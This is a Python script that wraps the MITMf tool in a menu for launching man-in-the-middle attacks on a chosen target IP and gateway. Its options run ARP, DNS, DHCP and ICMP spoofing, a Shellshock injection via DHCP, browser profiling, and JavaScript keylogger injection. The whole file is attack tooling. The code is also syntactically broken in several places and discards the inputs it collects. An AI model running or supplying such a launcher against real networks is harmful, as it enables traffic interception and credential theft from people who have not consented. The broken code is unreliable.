#!/usr/bin/python

import os
import socket

ip="127.0.0.1"
gateway="127.0.0.1"
menuOption=0
interface="eth0"

def WriteMainMenu():
	os.system("clear")
	print"	___________________________________________"
	print"	|         	***MAIN MENU***         	|"
	print"	|                                     	|"
	print"	|NOTE:Here is how its gonna work. You give|"
	print"	|me the target IP, Gateway, and what you  |"
	print"	|want to do and ill do the rest. If you   |"
	print"	|put something in wrong just restart. 	|"
	print"	|_________________________________________|"
	return
    
def WriteMenuOptions():
	os.system("clear")
	print"	_________________________________________"
	print"	|       	MAIN ATTACK OPTIONS     	|"
	print"	|_______________________________________|"
	print"	|1. Arp-Spoof   	2. Arp-Reply-Spoof  |"
	print"	|3. Browser-Profile 4. DHCP-ShellShock  |"
	print"	|5. ICMP-Spoof      6.Arp w/Keylogger   |"
	print"	|_______________________________________|"
	return
    
def GetGateway():
	gateway= raw_input("\nPlease Enter Targets Gateway or Router:")
	return gateway
    
def GetInterface():
	print "-----------------------------------------"
	os.system("ip link show")
	print "-----------------------------------------"
	interface= raw_input("\nPlease Enter Interface:")
	return interface    
    
def GetMenuSelection():
	menuOption=raw_input("\nSelect What you would like to do:")
	return menuOption
    
def WrtieIntro():    
    os.system("clear")
	print "-----------------------------------------------"
	print "***Welcome to the MITMF Script Kiddy Wrapper***"
	print "-----------------------------------------------"
    
def GetIP():
    ip= raw_input("\nPlease Enter Targets IP:")
    try:
   	 socket.inet_aton(ip)
    except socket.error:
   	 print("Thats not a valid IP slick!")
   	 GetIP()
    return ip
    
WrtieIntro()
WriteMainMenu()
os.system("ip addr")
GetIP()
GetGateway()
GetInterface()
WriteMenuOptions()

while True:
	menuOption=GetMenuSelection()
	os.system("clear")
	if menuOption=="1":
    	os.system("mitmf -i "+interface+" --arp --dns --spoof --gateway "+gateway+" --target "+ip+"/24)
    	break
	elif menuOption=="2":
    	os.system("mitmf -i "+interface+" --arp --spoof --gateway "+gateway+" --target "+ip+"/24 --mode rep")
    	break
	elif menuOption=="3":
    	os.system("mitmf -i "+interface+" --arp --spoof --gateway "+gateway+" --target "+ip+"/24 --browserprofiler")
    	break
	elif menuOption=="4":
    	os.system("mitmf -i "+interface+" --spoof --dhcp --shellshock \'echo Pwn3d\'")
    	break
	elif menuOption=="5":
    	os.system("mitmf -i "+interface+" --spoof --icmp --gateway "+gateway+" --target "+ip)
    	break
    	elif menuOption=="6"
    	os.system("mitmf -i "+interface+" --arp --dns --spoof --gateway "+gateway+" --target "+ip+" --jskeylogger")
	else:
    	whileLoopBool=False
    	print"Invalid Selection slick, Try again, and get it right this time."
    	WriteMenuOptions()

print "STARTING PROGRAM HAPPY PEN-TESTING :D \n\n"
    








